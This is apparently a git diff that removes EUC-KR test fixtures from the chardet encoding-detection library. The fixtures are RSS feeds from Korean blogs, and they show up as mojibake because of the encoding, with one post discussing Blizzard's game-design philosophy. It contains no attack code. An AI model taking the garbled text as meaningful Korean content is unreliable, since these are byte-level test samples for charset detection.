    --ֱַ׀±³¶§ ¶³¾מֱר ´ד¹ט ²ֳַ ֱײ¾מ´°¡.. ±ךְ» ¼¼¿ל°ם ´ד¹ט¸¦ ֳ¶ףַֿ°װ ַַ´ֲ½ְִַ(÷ׂ½ײַׁ ¾ְֶת¾¾ֳ³·³.) ³מְּ¿¡ ¸ְ µי¸° ְְּ ְײ¾ת´...(ִ£±¸µיְּ ´ ֶ¯ְּ ַ´... ¹°·׀ ³×µµ..)ְ¸ר °ֹ¸² ¿ְַ״ ¹±ג µ ֱֱ¾ְׂ»ֵµ¥~ ¿ײ ±׳·± ְו³­ְ» ֱס°ו´ֱֲצ~ ֱֲ.
    -
    -ֳ³ְ½ ¼תְּ¶ץ°ֹ ¾ֻ°װµָ°װ
    --¿×½ֳ ֱַ׀±³¶§ ִ£±¸ ֱ‎ ÷ס¾תְ»¶§ ±ג´כ°¡µז ¸ֱֶײ¸¦ »ח´°¡ ¸¶¼ֵ÷ֳ´.
    - ¸ְ¾ר¾מ¼­ °תְ¸¸ ְ¶א ¸װ¾ת´ר ±ג¾ןְּ.... ³­ ¿©ְָק ±ִֹ ¼תְ» ֱ¶¾ֶ ֱַֿצ¸¦ ¾´ֲ´.
    -
    -ֳ³ְ½ µ־·ֱ¿עְ» ¾ֻ°װµָ°ַ
    -- ¾ֶ÷°¡ ֵ«¸¾ ¸װ°ם ÷ס½ׁ ְְ°ֵ »חֱײ¼ּ´ֲµ¥.. ³»¸® ¸·±ז¼­ ³ׁ¾מֱ®¼­ ְְ°ֵ ¾ױְּ ´ ÷־¼­ֱ®¼­ ַׁ´כ ¾¾°װ ¸ֲ¾ְׂ»¶§.. (±¸±¸ ½÷·¯½÷ֶ® ַֿ³×·־ ¾ֶ÷ְַ ָ­ַ״¸¦ ¹¾ֶ µי¿´´.) ְְ°ֵ¿¡ ´כַׁ ¾ֱָ¶ְ÷ ֳ¾ןְ¸·־. ³­ 22»לְּ µַ¾מ¼­¾ ´½ֳ ְְ°ֵ¸¦ ¹ט¿ן¼צ ְײ¾ת´.
    -
    -ֳ³ְ½ ¹«¼­¿עְ» ¾ֻ°װµָ°ַ
    -- ְ§¿ֽ µ¿ְֿ.(ְּ°װ ±µ¥ ֱ₪¸» ֳ³ְ½ ְ÷ ¾ֶ´ֿ°־ֱצ. ±׳ ¾ױְַ ±ג¾ןְ÷ ¾ָ³×´ֲ°ְֽֿµם).
    -
    -ֳ³ְ½ »ח¶ְ» ¾ֻ°װµָ°ַ
    -- ³­ ¾ֱֶק »ח¶ְ» ¸פ¶ף~¢(ֱֲָ¸ְ ³כ·¡°¡ °©ְ±ג»‎°¢³µְ½~)
    - ±µ¥ ֱ₪¸»¸נ¸£°´~
    - ±¸³ֹ ³²ְִ£±¸¸¦ ֱ¦´כ·־ ֳ· ¸¸³×÷»°ַ 20»ל¶§ ¿´ְ¸´ֿ±מ..
    - ±׳°װ ¸ֲ°ֱצ.~ ^-^; - ]]> -
    - ¹ּ÷׀·ש - Sun, 16 May 2004 08:59:23 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/lennon81.egloos.com.xml b/chardet/tests/EUC-KR/lennon81.egloos.com.xml deleted file mode 100644 index 0b645b5..0000000 --- a/chardet/tests/EUC-KR/lennon81.egloos.com.xml +++ /dev/null @@ -1,125 +0,0 @@ - - - - - believeinme - http://lennon81.egloos.com - ֳ½ְֹ¸·־. - ko - Thu, 5 Feb 2004 01:02:26 GMT - - believeinme - http://pds.egloos.com/logo/1/200402/05/10/a0011610.gif - http://lennon81.egloos.com - 80 - 78 - ֳ½ְֹ¸·־. - - - <![CDATA[ ÷¹ַ׀, ְװ´ֿ´ ]]> - http://lennon81.egloos.com/1117549 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Mon, 5 Sep 2005 15:39:17 GMT - - - <![CDATA[ ְַּֿ¿¡³× ִִַ»ֵֽ ¾ק±׳·¹ְּµו ]]> - http://lennon81.egloos.com/1060332 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Thu, 7 Jul 2005 14:30:46 GMT - - - <![CDATA[ ¹°ױ ¼¼ְֿ & ֶ¯°¡ ֱ₪÷¸ ]]> - http://lennon81.egloos.com/1058269 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Tue, 5 Jul 2005 17:04:18 GMT - - - <![CDATA[ ¼¼»ףְּ ¹²מ°ם ְײ´´ֲ °ְֽ» ´ְ³¥ ¶§ ]]> - http://lennon81.egloos.com/1057193 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Mon, 4 Jul 2005 16:39:48 GMT - - - <![CDATA[ ְ־°£°°טְַ ¿×ִ¡ ]]> - http://lennon81.egloos.com/1049841 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Mon, 27 Jun 2005 15:51:30 GMT - - - <![CDATA[ ±ָ² ]]> - http://lennon81.egloos.com/1028569 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Tue, 7 Jun 2005 12:51:03 GMT - - - <![CDATA[ ֱצ°¢ ְ½¾ַ ¸±·¹ְּ ]]> - http://lennon81.egloos.com/1014270 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Wed, 25 May 2005 19:36:54 GMT - - - <![CDATA[ ¿מְ¸יַד ֳכµז ¼÷°ר ]]> - http://lennon81.egloos.com/1011290 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Mon, 23 May 2005 02:35:21 GMT - - - <![CDATA[ ·װµ¥ֱ¦°ת, ¾ײ´ֵֿ¸ְ׃ ]]> - http://lennon81.egloos.com/1008643 - - ± ְֳ¼÷¸±ג - ]]> - - + ֱ¾ף°ֵ¸®´ֲ ְּ¾±ג - Fri, 20 May 2005 10:49:24 GMT - - - diff --git a/chardet/tests/EUC-KR/oroll.egloos.com.xml b/chardet/tests/EUC-KR/oroll.egloos.com.xml deleted file mode 100644 index 6763539..0000000 --- a/chardet/tests/EUC-KR/oroll.egloos.com.xml +++ /dev/null @@ -1,171 +0,0 @@ - - - - - ¦ֵDr.Oroll[¿°ט÷´ְ¹®ְַ]¦ֲ - http://oroll.egloos.com - ´÷¿ו½ֳ¸®ְװ´ֿ´ח. ֱ¦ ¸½ֱֵ®·־ ֱֳִֵַ״ֱײ¼ֵ¿כ~ ַמֶ‏±¸ְװַ½¿µױ¡ - ko - Tue, 17 Jun 2003 10:07:59 GMT - - ¦ֵDr.Oroll[¿°ט÷´ְ¹®ְַ]¦ֲ - http://pds.egloos.com/logo/1/200306/17/18/a0000018.jpg - http://oroll.egloos.com - 80 - 87 - ´÷¿ו½ֳ¸®ְװ´ֿ´ח. ֱ¦ ¸½ֱֵ®·־ ֱֳִֵַ״ֱײ¼ֵ¿כ~ ַמֶ‏±¸ְװַ½¿µױ¡ - - - <![CDATA[ ְב½ֳ¸¸ ¾ָ³ח.. ]]> - http://oroll.egloos.com/1042734 - - ± ְֳ¼÷¸±ג - ]]> - - ¢¾ֱצ±¸ְֿ±ג¢¾ - Mon, 20 Jun 2005 17:59:12 GMT - - - <![CDATA[ ֱצ±±מֱצ... ]]> - http://oroll.egloos.com/1038803 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Thu, 16 Jun 2005 20:02:59 GMT - - - <![CDATA[ ´÷¿ו°ת ³×´ֲ ַׁ¸צ..? ]]> - http://oroll.egloos.com/1021494 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Tue, 31 May 2005 21:17:37 GMT - - - <![CDATA[ »ץ·־ ְּ»ח°¥ ֱ‎.. ]]> - http://oroll.egloos.com/1008171 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Fri, 20 May 2005 02:24:47 GMT - - - <![CDATA[ ֱ‎¹ְ» ³×°¡±גְ...ֶ®·¢¹י.. ]]> - http://oroll.egloos.com/1000951 - - ± ְֳ¼÷¸±ג - ]]> - - ¢¾ֱצ±¸ְֿ±ג¢¾ - Fri, 13 May 2005 05:11:57 GMT - - - <![CDATA[ ²² ¼צ ְײ´´ֲ °ַ »ל¾ְֶײ´´ֲ ֱץ°ֵ.(°¡µחֵ׳½÷¶ַ¿כ..-₪µ-) ]]> - http://oroll.egloos.com/991683 - - - - ¹ּ÷׀·ש - Wed, 4 May 2005 16:45:48 GMT - - - <![CDATA[ ½ײ¹«ֱצ°³ ÷»ְ ְײ³×¿ה? ]]> - http://oroll.egloos.com/986804 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Sat, 30 Apr 2005 12:12:58 GMT - - - <![CDATA[ ְּ°קְ÷ ְ£¸µֵז. ]]> - http://oroll.egloos.com/986796 - - - - ¹ּ÷׀·ש - Sat, 30 Apr 2005 12:03:34 GMT - - - <![CDATA[ ְב±ס ´¸¥ ֱצ¹זְ¸·־.. ]]> - http://oroll.egloos.com/986561 - - ± ְֳ¼÷¸±ג - ]]> - - ¢¾ַ״¿ָ¯ְְֱֿצ¢¾ - Sat, 30 Apr 2005 04:51:38 GMT - - - <![CDATA[ ¿ְ·ׁ¼ׂ½ִ 4 ]]> - http://oroll.egloos.com/986463 - - ± ְֳ¼÷¸±ג - ]]> - - ¢¾ַ״¿ָ¯ְְֱֿצ¢¾ - Sat, 30 Apr 2005 02:43:14 GMT - - - diff --git a/chardet/tests/EUC-KR/poliplus.egloos.com.xml b/chardet/tests/EUC-KR/poliplus.egloos.com.xml deleted file mode 100644 index 0c8b3cb..0000000 --- a/chardet/tests/EUC-KR/poliplus.egloos.com.xml +++ /dev/null @@ -1,168 +0,0 @@ - - - - - ¸ם°ט ¹י¿ֱ·ח ~ Possessed by Phoenix ~ - http://poliplus.egloos.com - ¾קµ¥ְֶּ®÷ׂ·®÷ם·־±׳××־ - ko - Wed, 26 Nov 2003 01:28:38 GMT - - ¸ם°ט ¹י¿ֱ·ח ~ Possessed by Phoenix ~ - http://pds.egloos.com/logo/1/200311/26/14/a0006614.jpg - http://poliplus.egloos.com - 80 - 80 - ¾קµ¥ְֶּ®÷ׂ·®÷ם·־±׳××־ - - - <![CDATA[ 2005³ג ³» ְּ±·ח °ב»ך ]]> - http://poliplus.egloos.com/1220222 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Fri, 30 Dec 2005 17:03:21 GMT - - - <![CDATA[ ÷״÷״¸¶·חְֿ÷¸ ¼±ֱ₪ 2005³גµµ ÷£½÷ֶ®µי ]]> - http://poliplus.egloos.com/1218113 - - ± ְֳ¼÷¸±ג - ]]> - - ב´ׂ³דֻת׀סי(Test) - Wed, 28 Dec 2005 14:41:46 GMT - - - <![CDATA[ AS³×³כ! ]]> - http://poliplus.egloos.com/1217104 - - ± ְֳ¼÷¸±ג - ]]> - - ב´ׂ³כ´‎פסי(Entertainment) - Tue, 27 Dec 2005 12:36:20 GMT - - - <![CDATA[ ¹ֱּצ¿ְַֽ ֱ¶¿ל ]]> - http://poliplus.egloos.com/1213340 - - ± ְֳ¼÷¸±ג - ]]> - - ב´ׂ³דֻת׀סי(Test) - Thu, 22 Dec 2005 17:26:14 GMT - - - <![CDATA[ ¿ְ´ְֳַ ÷״÷״¾ײ´ְֿֿ÷¸ ]]> - http://poliplus.egloos.com/1212152 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Wed, 21 Dec 2005 12:16:43 GMT - - - <![CDATA[ ´כ·תְַ ֵ¬¶ף³×µו ]]> - http://poliplus.egloos.com/1209425 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Sun, 18 Dec 2005 12:38:03 GMT - - - <![CDATA[ TAְַ ÷¸¹°ְ» ֳ£ְ¸·¯°¡ְ ]]> - http://poliplus.egloos.com/1208803 - - ± ְֳ¼÷¸±ג - ]]> - - ב´ׂ³כ´‎פסי(Entertainment) - Sat, 17 Dec 2005 14:29:03 GMT - - - <![CDATA[ ְ־»‎ְַ ÷¸¹°ְ» ֳ£ְ¸·¯°¡ְ ]]> - http://poliplus.egloos.com/1208068 - - ± ְֳ¼÷¸±ג - ]]> - - ב´ׂ³כ´‎פסי(Entertainment) - Fri, 16 Dec 2005 13:01:15 GMT - - - <![CDATA[ Posessed by Phoenix ]]> - http://poliplus.egloos.com/1205221 - - ± ְֳ¼÷¸±ג - ]]> - - ב´ׂ³כ´‎פסי(Entertainment) - Tue, 13 Dec 2005 14:03:02 GMT - - - <![CDATA[ ¿ְ´ְֳַ ÷״÷״ֵ÷¸·ְֿ÷¸(...) ]]> - http://poliplus.egloos.com/1201152 - - ± ְֳ¼÷¸±ג - ]]> - - ¹ּ÷׀·ש - Thu, 8 Dec 2005 15:51:56 GMT - - - diff --git a/chardet/tests/EUC-KR/scarletkh2.egloos.com.xml b/chardet/tests/EUC-KR/scarletkh2.egloos.com.xml deleted file mode 100644 index 3ab07ef..0000000 --- a/chardet/tests/EUC-KR/scarletkh2.egloos.com.xml +++ /dev/null @@ -1,238 +0,0 @@ - - - - - ¡ ¢×¡£¢×¾׃ֵ­³ְֹּ¡£¢×¡£¡ - http://scarletkh2.egloos.com - ..... - ko - Wed, 31 Dec 2003 01:15:05 GMT - - ¡ ¢×¡£¢×¾׃ֵ­³ְֹּ¡£¢×¡£¡ - http://pds.egloos.com/logo/1/200312/31/62/a0008862.gif - http://scarletkh2.egloos.com - 71 - 89 - ..... - - - <![CDATA[ WWBD(What Would Blizzard Do)?? ]]> - http://scarletkh2.egloos.com/1074480 - - -
    -¹ר¿×: ±טֱ¾µז
    -
    -ְּ ±ְ÷ CGWְַ 2000³ג 7¿שָ£¿¡ GreenSpeakְּ¶ף´ֲ °םֱ₪ ֳִ·³¿¡ 'What Would Blizzard Do?'
    -
    -¶ף´ֲ ֱ¦¸סְ¸·־ ½ַ¸° ±ְװ´ֿ´.
    -
    --------------------------------------------------------------------------------------
    -¿ײ °װְ׃ָ¸»חµיְ÷ ֱִָר °װְ׃µיְ» ¸¸µי±מ? ְּ ֱת¹®ְ÷ ³×¸¦ ¿ְ·§µ¿¾ָ ´חָ₪½÷·´°װ ¸¸µי¾ת°ם
    -´ְ÷ ¹ד±מֱצ ְבµיֱצ ¸רַֿ°װַ´. ³×´ֲ ְּ ְְֿ» ַֿ¸י¼­ ְּ°ֹ °װְ׃ְּ¶ף°ם ֳג½ֳַ´´ֲ °ֹ
    -µµְתָק ¹ְֿ» ¼צ ¾ר´ֲ °װְ׃µיְ» ÷¸¸ח ¿ְ·£ ½ֳ°£µ¿¾ָ »‎°¢ַ´. ³×¸¦ ¼רֱרַֿ´°ם ַ״µµ ֱֱֱצ¸¸,
    -ֱ₪¸» ¾מ¶»°װ ְּ·± ְְּֿ »‎±ג´ֱֲצ´ֲ ¸נ¸£°´.
    -±׳¸®°ם ³×´ֲ ¾מµע°¡¿¡ ¿ײ ´ְ½°ת °°ְ÷ ±ְּ ¿ֳ¶ף¿ְֱצ¸¦ ¾´ֱֲצµµ ±ֳ±ַֿ´.
    -
    -°װְ׃°³¹ְ 1 : ¿ל¸®°¡ µµ´כֳ¼ ¿©±ג¼­ ¹» ַֿ´ֱֲצ¸¦ ¸נ¸£°¾מ. ¿ל¸®°¡ ¸¸µח ְּ °װְ׃ְ» ֳַ·¹ְּ ַֿ´ְ´ֿ ֲק¶ף¸® ³»°¡ ֵהַׁ°ֹ ¸װ°³׳.
    -
    -°װְ׃°³¹ְ 2 : ¿פ±גֱצ¸¶. ¿ל¸® °װְ׃ְ» ַֿ´ְ´ֿ ֲק¶ף¸® ³»°¡ ³ ֵהַׁ°ֹ ¸װ°¾מ. ¿ל¸° ֱ₪¸» ֱ·°°¾ֶ.
    -
    -°װְ׃°³¹ְ 1 : ¿ל¸® ±׳³ֹ ְּ ¾²·¹±ג °°ְ÷ °װְ׃ְ» ֳכ¼ַֿׂ°ם ְּ·± ֱ· °°ְ÷ °װְ׃ְ» ¸¸µי·ֱ°ם ַ´ר°ֽ¿¡ ´כַ״¼­ °ר°³ְְ¸·־ »ח°ת¸¦ ְַֿ±¸.
    -
    -°װְ׃°³¹ְ 2 : ±׳·¡, ±׳·¯¸י ֲק¶ף¸® ָ¸»ח¸¦ ֱ¢ְ. ¿ל¸® °װְ׃ °°ְ÷ °ְֽ¸·־´ֲ µµְתָק »ח¶קµיֵַׁ׳ µ· ¹°ם ֶַ´´ֲ »‎°¢ְ» ַֿ´ֲ °ֵ ְֳ¼°¡ ְ¸רµָ°ֵ¾.
    -

    -¸¹ְ÷ ÷¹ְג ´¾חַׁ ְְּ¯°¡ ְײ´´ֲ °ְֽ» ¾ָ´.
    -°װְ׃ְ» ¸¸µו´ֲ°װ ¾מ·ֶ´´ֲ °ֽµµ ¾ָ´.
    -ֱַֿצ¸¸ ְֿ÷־ ָ¸»חµיְ÷ °ט¼׃ַ״¼­ ְ ַ״³×°¡°ם ְײ´
    -- ¹רֱצ³× ¹ְּ¿ְ¿‏¾מ, ÷ֱַׂ·־±׳ ¶ַ´ֲ ¾ֱֶײ ֳײ°םְַ °ז¿לֱצ¸¸ ÷ם¸®ְתµו¸¦ ÷¼ ¶§¿¡µµ.
    - µ¶ף¼­ ÷ׂ°¡´ַֹֿ±ג¸¸ ַׁ °ְֽ÷ ¾ֶ´ֿ´.
    -
    -ְ½, ¾ֱֶק ·כ½־·ױµµ ֱ¢´כ ¹ֱצ ¸רַ°ם, ֱַ·־´הֱצµµ ¾°װ ¿©±ג¼­ ÷ם¸®ְתµו¸¦ ½ֵ°ָ­ ַֿ·ֱ°ם ַֿ´ֲ °ְֽ÷ ¾ֶ´ֿ´.
    -ֱַֿצ¸¸ ֳײ± 3°³ְַ °װְ׃µי(¿צֵ©·¡ֱֶַ®2, µנ¾ֶ÷ם·־, ½÷ֵ¸ֵ©·¡ֱֶַ®·־ ְּ¾מֱצ´ֲ ְַ½ְַֹ ¿©ֱצ°¡ ¾ר´ֲ ¸םְµי)ְ÷
    -¸ם¹יַֿ°װ ¹÷°¡ ֱ¦´כ·־ µַ¾ת°ם, ְּ¹רָ£ְַ ִ¿¹צ½÷ֵה¸®ְ־ µנ¾ֶ÷ם·־2¸¦ ÷¸¸י ְּ¹ר¿¡µµ ±׳µיְ÷ ¹÷°¡ ¶ַ ַׁ °ְַ»
    -ַׁ °ֹ·־ ÷¸ְ־´. (¿×ְֱײ – ֱ¦ֱַ ±׳¸°ְַ ¿ר¹® ְ¯¸׃·־´ֲ ¡®¼צַ¥¸¦ ¹ֱצ ¸רַ´(and I'm still waiting for their last bribe check)¡¯¶ף°ם ³×¿ֹ´ֿ´¸¸, ¿ל¸® ÷׀ְ§±ג¿¡ °םִ£´¸י ·כ½־·ױ ְֲּ ¾מ¿ן¸± µם ַֿ¿© ¼צֱ₪ַ½ְ´ֿ´.)
    -
    -ְּ·± °ֽµיְ÷ ³»°¡ ÷ם¸®ְתµו¿¡¼­ ´ְ÷ ¹ד ֲק¸¦ ²ר°ם ֱ‎ְ¸·־ ¿ְ¸י¼­ ³»°¡ ¸¸¾א °װְ׃ ָ¸»ח¸¦ ֲק·ָ´¸י
    -¸נµח ֱק¿רµי¿¡°װ 'WWBD?'¶ף°ם ¾²¿©ְײ´ֲ ֲֶָמ¸¦ ֳ₪¿צ¾ °´°ם »‎°¢ַֿ°װ ַ´.
    -"What Would Blizzard Do?(÷ם¸®ְתµו´ֲ ¹» ַׂ±מ?)"
    -±׳¸®°ם ְּ°ְֽ÷ ³»°װ ְּ·± ַ״´הµיְ» »‎°¢ַֿ°װ ¸¸µי¾מ ֱײ¾ת´.
    -
    -
    -°װְּ¸׃¸¦ °ם¿כַ״¶ף
    -
    -: °װְ׃ְ» ¸¸µו´ֲµ¥¿¡´ֲ ְח´ְֹּ ְײ´ֲ °³¹ְ°¡ ַ¿הַׂ °ְּֽ´.
    -±׳¸®°ם "°װְ׃ְ» ¸¸µי°ם ְײ´"¶ף´ֲ °ְּֽ ¾מ¶² °ְֽ־ֱצ ְַּ״ַֿ´ֲ °³¹ְµµ ַ¿הַֿ´.
    -ְּ·¯ַׁ ֱ¶°ְַ» °¡ֱר ֳײְְַ »ח¶קְ÷ ¹·־ °װְּ¸׃µיְּ´.
    -¸נµח ְֶ¿רµיְּ ±׳µיְּ ¸¸µי·ֱ°ם ַֿ´ֲ °װְ׃¿¡ ´כַ״¼­ ¿ֿ÷®ַֿ°װ ְַּ״ַֿ°ם ְײ°ם,
    -¿ײ ¸¸µי·ֱ°ם ַֿ´ֱֲצ¸¦ ¾ֻ¾ֶ¾ ַׁ´.
    -¸¸¾א ±׳·¸ֱצ ¸רַׁ »ח¶קְּ ְײ°ֵ³× ½ֵ³הְ» °®ֱצ ¸רַֿ°ֵ³× °װְ׃ְּ ֱצ·חַֿ´°ם »‎°¢ַֿ´ֲ »ח¶קְּ ְײ´¸י,
    -±׳ ְְֶ÷ ¹®ֱ¦¸¦ °®°ם ְײ´ֲ °ְּֽ´.
    -¸נµח ְֶ¿רµיְ÷ ³ָס°¡ ¸¸µו´ֲ °װְ׃ְַ °¡ְו ¿­±₪ְְ־ ְֶּׂ¾מ¾ ַֿ°ם °¡ְו ³ֱֳ₪ַׁ ֶע·׀°¡°¡ µַ¾מ¾ ַׁ´.
    -
    -
    -ְֱ¸½ְֹ» ¹צ·ֱ¶ף
    -
    -: 11½ֳ°¡ ³ְׁ÷ ½ֳ°¢ ÷ם¸®ְתµו ³כ½÷(Blizzard North)¿¡¼­ ³×´ֲ µµ´כֳ¼ ´©°¡ µנ¾ֶ÷ם·־2¸¦ ¸¸µי¶§
    -¾מ¶² ְְֿ» ַ´ֱֲצ ¾ֻ ¼צ°¡ ¾ר¾ת´. ¿ײ³ִַֿ¸י ¸נµח »ח¶קµיְּ ±׳ °װְ׃(µנ¾ֶ÷ם·־2)ְַ ¸נµח ֳר¸י¿¡ ´כַ״¼­
    -ְּ¾±ג ְַ¸¸ח, ´©±¸µµ ¾מ¶² °ְֽ» ְ½ְֵַ °ר(ֽם)ְ¸·־ µ¹¸®´ֲ »ח¶קְּ ¾ר¾ת´.
    -±׳·¡ַָ ¾ֶֶ¼½÷ֶ®´ֲ ֱַ·־±׳·¥ְַ ִµו¿¡ ´כַ״¼­ ְּ¾±גַֿ°ם,
    -ֱַ·־±׳·¡¸׃´ֲ ±׳·¡ַָ¿¡ ´כַ״¼­ ְּ¾±גַ´.
    -´©±¸µµ ְ½ְֵּ ְ³µ´°ם ַֿ´ֲ »ח¶קְ÷ ¾ר¾ת´. ³×´ֲ ¾מ¶² »ח¶קְּ ±׳ °װְ׃ְַ ְֳ¼ ִµו¸¦ ֲ®°ֵ³×,
    -¸נµח ·¹÷§ְ» µנְְ־ַ°ֵ³×, ¸נµח ¿¡´ֿ¸ְּ¼ְַ» ±׳·ָ°ֵ³×, ¸נµח ½÷ֵה¸®¸¦ ¾´ °ז¿ל°¡ ¾ֶ´ֿ¶ף¸י
    -±׳ »ח¶קְַ ְּ¸§ְּ ֵ¸ְֶּ² ¾ױ¿¡ ¿ֽ¼­´ֲ ¾ָµָ´°ם »‎°¢ַׁ´.

    -
    -(¿×ֱײ: ֱ¦ֱַ ±׳¸°ְַ »‎°¢ְ÷ ½ֳµו¸¶ְּ¾מ °°ְ÷ °³¹ְְַ ְּ¸§ְּ °װְ׃ ֵ¸ְֶּ²ְַ ¾ױ¿¡ ÷´ֲ °ְֽ» ¸»ַֿ´ֲ µםַװ)
    -
    -°װְ׃ְ÷ ¿µָ­ֳ³·³ ֱ‎´ְּ ³כ·ֲַ״¼­ ¸¸µי¾מ³½ °ב°תְּ´.
    -¸נµח »ח¶ק¿¡°װ ¸» ַׂ ±ְַַׁ» ֱײֱצ ¾´ֲ´¸י µµ¿עְ» ¾עְ» ¼צ ¾רְ» »׃´ץ·¯, ְֱֱ÷ °װְ׃ְ» ¸¸µי ¼צµµ ¾ר´.
    -ַׁ »ח¶ק¿¡°װ ֱצ³×ִ¡°װ ¸¹ְ÷ ±ְַַׁ» ֱ״´¸י, ±׳ ±ְַַׁ» °¡ֱר »ח¶ק¿¡°װ ִ¡¿©¼­ ±׳¸¸µ־°װ µֹ °ְּֽ´.
    -

    -(¿×ֱײ: °¸®ְ³× ±גָ¹ ְְֶו µמ ֶםֱµָ ְַָ ±¸ֱ¶´ֲ ¼­·־ְַ ִֶ¿צ°װְ׃, ֱ₪ִ¡¸¦ ַֿ°װ µַ°ם ְּ °ֽ¿¡ ְַַ״¼­ ¹׀·ֱ³×°װ µֹ °ְּֽ¶ף´ֲ ¶ז, ¿ר¹®ְ÷ ¡®and you end up with DOMINION¡¯.)
    -
    -
    -±ג¼ת¿¡ ֱֳ¡ְ» ¸ֱֲֳצ ¸¶¶ף
    -
    -: ¹ה¹ת·¹ ֱַ·־±׳·¡¸׃³× µנְְּ³¿¡°װ ְֱײ µט´ֲ ¸» ְֱַ ַֿ³×´ֲ ±׳µיְַ °װְ׃ְּ
    -÷ר¹ז¿ןְּ ¶³¾מֱצ´ֲ °ְֽ» ±¸ַצַ°ם ±׳¸²ְ°¡ ·»´ץ¸µ µָ´¸י¼­
    -ְ½ֵµיְַ °װְ׃ְּ ¾ף¸¶³× ַָ¸¢ֱַׁצ¿¡ ´כַ״¼­ ְּ¾±גַֿ´ֲ °ְּֽ´.
    -±׳¶§¸¶´ ³×´ֲ ±׳µיְַ ´כ°¡¸®¸¦ ¹ְּ½÷¿¡ ²ָ°ם 2~3´«±ְ» µ¹¸° ´ְ½ ±ֽ²³ח¿¡´°¡ ְּ·± ¸»ְ» ַ״ֱײ°ם ½ֽ´.
    -"¾ֶ¹«µµ ±׳·± °ֵ¿¡ ½ֵ°ז ¾ָ½ב!!"
    -µנ¾ֶ÷ם·־2´ֲ 2D¿¡ 640x480ְַ ַ״»ףµµ·־ ¸¸µי¾מֱ³ֱצ¸¸ ֳײ¼ַׁׂ ֱײ¿ה ֶַ¸ֵ»ף°ת ְ¥»חְֶּ®¿¡¼­
    -¿ֳַ״ְַ °װְ׃ְַ ִָ÷¸°¡ µֹ °ְּֽ´. ¾ֶ´ֿ¶ף¸י ³»°¡ ַׁ´µ¿¾ָ ¿ְֵה¹ְּ¸¦ ֵ¸°ם ´´ֿ¸י¼­ ¼¼ֵ¹ ¹ט´ְְֿ» ַֿ°´.
    -°ב±¹, ¸נµח °ְֽ÷ °װְ׃ְַ ³»¿כְּ´. ±׳°ֹ·־ ³¡ְּ´. ÷ס°¡ ¿ְ´ֱֲצ¿¡ ½ֵ°זְ» ¾²´ֲ »ח¶קְּ¶ף¸י
    -±׳°ַ ³׳ ¾צ¸¶°¡ ¾ֶ´ֿ¸י ´¸¥ ֱַ·־±׳·¡¸׃µיְֿ °ְּֽ´. ±׳ ¿¿¡´ֲ ´ֱצ ְֱֱ÷ °װְ׃ְ» ¹¶צ »׃ְּ´.
    -

    -(¿×ֱײ: ְּ ³»¿כµµ ֱ¦ֱַ ±׳¸°ְַ ְ¯¸׃ְ־µ¥, ÷ס°¡ ¿ְ¸י °ֱֶ₪ַֿ´ֲ »ח¶ק, ¾מ¸׃´ֿ´ֲ ְ½ְִַ ¿ְּ ֱ¥ְ»±מ÷ֱ ÷ס ¿ְ´ֲ °ֽ¿¡ ½ֵ°זְ» ¾´´´ֲ ¶זְ׃)
    -
    -
    -´¸¥ ָ¸»חµיְַ °װְ׃ְ» ַ״¶ף
    -
    -: ¾מֲמ µַ¾תµח ³ָס °װְ׃ְּ ֱ₪¸» ַָ¸¢ַֿ´°ם »‎°¢ַֿµח ´©±÷°¡ ´¸¥ °׳ְ» ֱ¦ְַֿ°ם ְײµח
    -ְּ¹ּ ֳג½ֳַµח ±׳·± °ֽµיְ÷ ¹®ֱ¦°¡ µֱַצ ¾´ֲ´.
    -¸נµח °װְ׃ְ» ÷¼ ַ¿ה°¡ ְײ°ם ¸נµח °װְ׃ְ» ֳַ·¹ְּ ַ״¾ַֿ¸ח ַ׳»ף ¿ְֲַ¸¶ְ־µו¸¦ ְ¯ֱצַ״¾ ַׁ´.
    -ֵ¸ְּ÷£¸®¾ָ ¼±ְ» ±ג¾ןַֿ´ֲ°¡?
    -ֵ¸ְּ÷£¸®¾ָ ¼±ְ÷ Westwoodְַ ֱק¿רµיְּ ±׳ °װְ׃ְ» ְ¾קַֿ´ֲ µ¿¾ָ ַׁ¹רµµ
    -RTS °װְ׃ְ» ַ״÷» ְְּ ¾ר´ֲ °ֽ ֳ³·³ ÷¸ְ־´.
    -µנ¾ֶ÷ם·־2´ֲ ±׳µיְּ °װְ»·¶´°ֵ³× ¹«´ֹ·ֲַ״¼­ °װְ׃ְּ ¿¬±גµַ¾ת´ר °ְּֽ ¾ֶ´ֿ´.
    -ְּ °ְֽ÷ ֱ₪ָ®ַֿ°װ »ף¹µָ´.
    -÷ם¸®ְתµו ³כ½÷´ֲ ¹«¾שְּ ְֱֱ÷ °ְּֽ°ם ±׳µיְַ °װְ׃ְּ ´ץ ³×¾ֱֶצ±ג ְ§ַ״¼­´ֲ
    -¹«¾שְּ ַ¿הַׁ ֱצ¸¦ ¾ֻ±ג ¶§¹®ְּ´. °זְןְּ¶ץ °ְֽ÷ ְֱֱ÷ °ְּֽ´.
    -
    -
    -ֵ©¸®½÷¸¶½÷ µְ§´ֲ ְ״¾מ¹צ·ֱ¶ף
    -
